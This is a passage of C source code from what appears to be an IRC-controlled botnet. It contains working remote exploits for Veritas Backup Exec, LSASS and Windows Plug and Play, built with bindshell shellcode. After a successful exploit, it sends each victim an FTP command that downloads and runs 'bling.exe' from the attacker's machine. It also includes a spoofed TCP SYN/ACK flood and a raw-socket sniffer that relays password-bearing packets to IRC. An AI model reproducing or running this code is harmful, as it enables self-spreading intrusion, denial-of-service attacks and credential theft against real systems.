shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
int WksSocket(int tm, int port, const char *WksIP) {
unsigned int sock;
unsigned long y = 1;
struct timeval timeout;
struct sockaddr_in target_ip;
if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = finet_addr(WksIP);
target_ip.sin_port = fhtons(port);
fioctlsocket(sock,FIONBIO,&y);
timeout.tv_sec=tm;
timeout.tv_usec = 0;
if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1)
{
fd_set writefds;
fd_set exceptfds;
FD_ZERO (&writefds);
FD_ZERO (&exceptfds);
FD_SET (sock, &writefds);
FD_SET (sock, &exceptfds);
fselect(0, NULL, &writefds, &exceptfds, &timeout);
//if (!FDI_ISSET (sock, &writefds))
if (!__fWSAFDIsSet(sock, &writefds))
{
fclosesocket(sock);
return -1;
}
y=0;
fioctlsocket(sock,FIONBIO,&y);
}
return sock;
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
{
char buffer[LOGLINE];
int size;
unsigned short src_port = 9801;
TCPHEADER2 send_tcp;
send_tcp.source = fhtons(src_port);
send_tcp.dest = fhtons((unsigned short)port);
send_tcp.seq = rand();
send_tcp.ack_seq = 0;
send_tcp.res1 = 0;
send_tcp.res2 = 0;
send_tcp.doff = 5;
send_tcp.fin = 0;
send_tcp.syn = 1;
send_tcp.rst = 0;
send_tcp.psh = 0;
send_tcp.ack = 0;
send_tcp.urg = 0;
send_tcp.window = fhtons(512);
send_tcp.check = 0;
send_tcp.urg_ptr = 0;
PSDHEADER psdheader;
psdheader.saddr = src_ip;
psdheader.daddr = dest_ip;
psdheader.zero = 0;
psdheader.proto = IPPROTO_TCP;
psdheader.length = fhtons(sizeof(send_tcp));
memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
SOCKADDR_IN ssin;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)port);
ssin.sin_addr.s_addr = dest_ip;
int ssin_len = sizeof(ssin);
SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if (tcp_sock == INVALID_SOCKET) {
addlog("socket open failed");
return FALSE;
}
if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
addlog(buffer);
fclosesocket(tcp_sock);
return FALSE;
}
RECVHEADER recv_tcp;
memset (&recv_tcp,'\0',sizeof(recv_tcp));
while (recv_tcp.tcp.dest != src_port) {
if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
addlog("recvfrom() socket failed");
fclosesocket(tcp_sock);
return FALSE;
}
}
fclosesocket(tcp_sock);
if (recv_tcp.tcp.syn == 1) {
addlog("Socket open.");
return TRUE;
} else {
addlog("Socket closed.");
return FALSE;
}
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}